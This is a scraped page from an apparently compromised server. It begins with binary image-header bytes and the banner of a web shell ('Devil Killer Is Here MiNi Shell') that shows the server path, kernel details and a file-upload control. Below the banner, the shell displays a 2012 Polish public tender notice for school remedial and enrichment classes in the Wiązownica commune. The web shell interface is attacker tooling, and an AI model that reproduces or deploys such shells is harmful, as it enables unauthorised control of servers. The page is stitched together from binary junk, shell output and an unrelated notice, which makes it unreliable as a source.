JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121221/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121221/523898-N-2012.html

<p class="kh_header"><b>Wiązownica: Indywidualizacja procesu nauczania i wychowania uczniów 
                                                      klas I-III Szkół Podstawowych w gminie Wiązownica w ramach  Działania: 9.1.Wyrównywania szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Poddziałanie: 9.1.2.Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 523898 - 2012; data zamieszczenia: 21.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , Wiązownica 208, 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Indywidualizacja procesu nauczania i wychowania uczniów 
                                                      klas I-III Szkół Podstawowych w gminie Wiązownica w ramach  Działania: 9.1.Wyrównywania szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Poddziałanie: 9.1.2.Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu      
        Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w 
        Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - 
        Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie 
        szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w 
        systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o 
        utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych oraz 
        dostawa pomocy dydaktycznych na doposażenie sal dydaktycznych szkół  niezbędnych do 
        prawidłowego prowadzenia zajęć przewidzianych  w ramach projektu.
    2)  Gmina Wiązownica reprezentowana przez Wójta Gminy wyznaczona w trybie art. 16 ust. 4 
           ustawy z dnia z dnia 29.01.2004 Prawo zamówień publicznych ( tekst jedn. Dz. U. z 2010, Nr 
           113, poz. 759 z późn. zm., ) jako Zamawiający upoważniony do przeprowadzenia niniejszego 
          postępowania w imieniu i na rzecz następujących jednostek organizacyjnych: 
         1. Zespół Szkół w Wiązownicy, 
         2. Zespół Szkół w Szówsku, 
         3. Zespół Szkół w Zapałowie,
         4. Szkoła Podstawowa w Piwodzie ( z filią w Cetuli), 
         5. Szkoła Podstawowa w Ryszkowej Woli, 
         6. Szkoła Podstawowa w Manasterzu.
           7. Szkoła Podstawowa w Mołodyczu. 
    3)  W ramach  udzielonego pełnomocnictwa, zamawiający  przeprowadzi postępowanie o 
         udzielenie zamówienia publicznego oraz dokona rozstrzygnięcia postępowania, w tym wyboru 
         najkorzystniejszej oferty  bądź unieważnienia postępowania. 
    4) Umowy na realizację przedmiotu zamówienia zawierane będą pomiędzy wybranymi w 
        przetargu wykonawcami a poszczególnymi dyrektorami jednostek organizacyjnych.
    5) Zajęcia w ramach projektu prowadzone będą w 7 szkołach na terenie Gminy Wiązownica: 
	1) Szkoła Podstawowa w Szówsku 
	2) Szkoła Podstawowa w Wiązownicy 
	3) Szkoła Podstawowa w Manasterzu 
	4) Szkoła Podstawowa w Piwodzie ( wraz z Filią w Cetuli)
	5) Szkoła Podstawowa w Zapałowie 
	6) Szkoła Podstawowa w Ryszkowej Woli
	7) Szkoła Podstawowa w Mołodyczu
    6) W ramach projektu przewiduje się dodatkowo doposażenie sal  w pomoce dydaktyczne
        niezbędnych do prawidłowego  prowadzenia zajęć przewidzianych  w ramach projektu. 
    7) Wszystkie zajęcia odbywać się będą w dni nauki szkolnej po zakończeniu obowiązkowych 
        zajęć lekcyjnych. Zamawiający zapewni bezpłatny dostęp do sal, w których prowadzone będą 
        zajęcia w szkołach biorących udział w projekcie. 
    8) Wykonawca zapewni osiągnięcie docelowych wskaźników projektu określonych we     
       wniosku o dofinansowanie we wskazanych poniżej zadaniach: 
     - poprawa umiejętności uczniów ze zdiagnozowanymi deficytami logopedycznymi , 
     - poprawa umiejętności uczniów poprzez zajęcia wyrównawcze z czytania i pisania oraz z 
       matematyki - dotyczy wszystkich uczestników zajęć przeznaczonych dla dzieci ze 
       specyficznymi trudnościami w czytaniu i pisaniu oraz dla dzieci z trudnościami w 
       zdobywaniu umiejętności matematycznych, 
     - zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji 
       społecznej, 
     - zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy oraz  rozwijanie szczególnych 
       zainteresowań uczniów w tym: zainteresowań matematyczno - przyrodniczych, plastycznych 
       i  artystycznych. 
    6) Obowiązki wykonawcy: 
    Osoby prowadzące poszczególne zajęcia przeprowadzą ewaluację projektu, sporządzą testy   
    oraz ankiety z ewaluacji w terminie ustalonym przez Zamawiającego, sprawdzające wiedzę  
    uczniów na początku oraz na końcu przeprowadzonych zajęć. 
    Zobowiązane są do prowadzenia  dokumentacji szkoleń w postaci dzienników zajęć. 
    Harmonogram realizacji poszczególnych zajęć Wykonawca opracuje we współpracy z 
    dyrektorami poszczególnych szkół biorących udział w projekcie, uwzględniając podział zajęć 
    dla każdej szkoły oraz plan lekcji beneficjentów ostatecznych. Harmonogram zajęć będzie 
    musiał być dostosowany do harmonogramu zajęć w ujęciu miesięcznym i rocznym 
    wynikającym z wniosku o dofinansowanie oraz potrzeb Zamawiającego. Zamawiający 
    zastrzega sobie prawo do zmiany miesięcznego planu zajęć. Zmiana przedmiotowego planu 
    zajęć nie wymaga formy aneksu do umowy. Przed rozpoczęciem zajęć edukacyjnych 
    Wykonawca otrzyma od dyrektorów poszczególnych szkół objętych projektem listy uczniów 
    zakwalifikowanych do udziału w projekcie (Beneficjentów Ostatecznych), z podziałem na 
    grupy w ramach każdego rodzaju zajęć. Liczba osób w grupie dla poszczególnych rodzajów 
    zajęć będzie zgodna z wytycznymi określonymi w Rozporządzeniu Ministra Edukacji 
    Narodowej z dnia 17 listopada 2010 r. (Dz. U. z 2010 r. Nr 228, poz. 1487) w sprawie zasad 
    udzielania i organizacji pomocy psychologicznej w publicznych przedszkolach, szkołach 
    placówkach oraz z zapisami wniosków o dofinansowanie projektu. 
   7) Wykonawca będzie przekazywał następujące dokumenty dotyczące realizacji zajęć: 
    - miesięczne sprawozdania z realizacji godzin w poszczególnych grupach zawierające analizę  
      frekwencji uczestników na zajęciach (w terminie do 10 dnia następnego miesiąca), 
    - imienny wykaz osób, które brały udział w zajęciach (w terminie do 10 dnia następnego 
      miesiąca), 
    - imienny wykaz osób, które zrezygnowały z udziału w zajęciach (w terminie do 10 dnia 
      następnego miesiąca), 
    - lista obecności uczniów (w terminie do 10 dnia następnego miesiąca), 
    - opisowa indywidualna ocena każdego ucznia na koniec projektu, 
    - zbiorcze podsumowanie dotyczące badania rezultatów zrealizowanych zajęć dydaktycznych 
     w całym okresie obowiązywania umowy. 
Wykonawca będzie zobowiązany do prowadzenia dziennika zajęć osobno dla każdej grupy oraz do prowadzenia zajęć metodami aktywizującymi z uwzględnieniem indywidualnych potrzeb edukacyjnych i rozwojowych dziecka, z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych od momentu ich dostarczenia przez Zamawiającego. 
Wykonawca jest zobowiązany umieścić logo programu i oznaczenia wskazane przez Zamawiającego na wszystkich opracowanych przez siebie materiałach oraz w korespondencji prowadzonej w związku z realizacją umowy. Wykonawca będzie zobowiązany do wydania uczestnikom projektu zaświadczeń o udziale w danych zajęciach na zakończenie zajęć. 
  
Przedmiotem zamówienia został podzielony na  32 następujących części:
Część (zadanie) Nr 1 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
w szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 32 godz. 
Termin realizacji  do dnia 30.06.2013 r. 
 Łączna liczba uczniów objęta zajęciami - 8 uczniów.
Część(zadanie)  Nr 2 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  ( 2 grupy) 
w łącznym wymiarze  godzin w ilości 64 (2 grupyx32).
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 13 uczniów.
Część (zadanie) Nr 3 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze  w ilości 
32 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 5 uczniów.
Część (zadanie)  Nr 4 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych, ze szczególnym 
uwzględnieniem nauk matematyczno - przyrodniczych w tym: prowadzenie obserwacji    
przyrodniczych, wykonywanie doświadczeń i eksperymentów, prowadzenie hodowli i 
obserwacje mikroskopowe, rozwijanie zainteresowań i zdolności matematycznych z 
ukierunkowaniem do udziału w konkursach matematycznych w  łącznym wymiarze  w ilości 
32 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów.
Część(zadanie)   Nr 5 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie w  
łącznym wymiarze w ilości 32 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 12 uczniów.
Część(zadanie)  Nr 6 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 40 godz. 
Termin    realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 8 uczniów.
Część (zadanie) Nr 7 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym 
wymiarze w ilości 40 godz.
Termin realizacji  do dnia 30.06.2013 r.  
Łączna liczba uczniów objęta zajęciami - 8 uczniów.
Część(zadanie)  Nr 8 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze  godzin w 
ilości 80 godzin (2 grupy x40 godz.).
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 8 uczniów.
Część (zadanie) Nr 9 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze  w ilości 40 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 7 uczniów.
Część (zadanie) Nr 10 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem umiejętności plastycznych i technicznych w  łącznym wymiarze  w   ilości 
40 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 8 uczniów.
Część(zadanie)  Nr 11 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 35 godz. 
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 7 uczniów.
Część(zadanie)  Nr 12 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli)  o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym     
wymiarze  w ilości 35 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 6 uczniów.
Część(zadanie)  Nr 13 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze w ilości 
80 godzin (2 grupy x40 godz.).
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 14 uczniów.
Część (zadanie) Nr 14 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze  w ilości 
120 godz. ( 3 grupyx40 godz.)
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 28 uczniów.
Część(zadanie)  Nr 15 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności teatralnych w  łącznym wymiarze w ilości 35 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów.
Część (zadanie) Nr 16 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności  plastycznych w  łącznym wymiarze  w ilości 35 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów.
Część (zadanie) Nr 17 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze  w ilości 90 godz. ( 3 grupy)    
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 11 uczniów.
Część (zadanie) Nr 18 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym 
wymiarze w ilości 60 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 6 uczniów.
Część (zadanie) Nr 19 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 30 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 3 uczniów.
Część (zadanie) Nr 20 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  nauk matematyczno - przyrodniczych, np. prowadzenie obserwacji   
przyrodniczych w  łącznym wymiarze  w ilości 30 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 4 uczniów.
Część(zadanie)  Nr 21 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności artystycznych, w  łącznym wymiarze w ilości 30 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 5 uczniów
Część (zadanie) Nr 22  Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 90 godz. ( 3 grupy)    
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 22 uczniów.
Część (zadanie) Nr 23 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym 
wymiarze  w ilości 60 godz. ( 2 grupy)
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów.
Część (zadanie) Nr 24 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy  ( 2 grupy) w łącznym  
wymiarze w ilości 60 godz. ( 2x30 godz.)
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów.
Część (zadanie) Nr 25 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji 
społecznej w łącznym  wymiarze w ilości 30 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 4 uczniów.
Część (zadanie) Nr 26 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 30 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 10 uczniów.
Część (zadanie) Nr 27 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności plastycznych, w  łącznym wymiarze w ilości 30 godzin.
Termin realizacji  do dnia 30.06.2013 r.  
Łączna liczba uczniów objęta zajęciami - 5 uczniów
Część (zadanie) Nr 28 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Manasterzu o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 32 godz. 
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 6 uczniów.
Część (zadanie) Nr 29 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Manasterzu o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 32 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 6 uczniów.
Część (zadanie) Nr 30 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Mołodyczu o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 200 godz. 
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 14 uczniów.
Część(zadanie)  Nr 31 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Mołodyczu o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym  
wymiarze w ilości 120 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów.
Część (zadanie) Nr 32 Doposażenie sal dydaktycznych w pomoce dydaktyczne na doposażenie sal dydaktycznych szkół  niezbędnych do prawidłowego prowadzenia zajęć przewidzianych  w ramach projektu, wg. zestawienia stanowiącego zał. do siwz.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 39.16.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał wniesienia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym  zakresie. 
       Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
       oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli w okresie ostatnich 3 lat przed upływem  terminu 
       składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali i   
       prawidłowo ukończyli co najmniej 1 zadanie polegające na dostawie pomocy dydaktycznych o 
       wartości co najmniej  20 000 zł brutto (dotyczy części Nr 32).
     Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
     a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
     b) wykazu wykonanych zamówień wg. zał. do siwz.
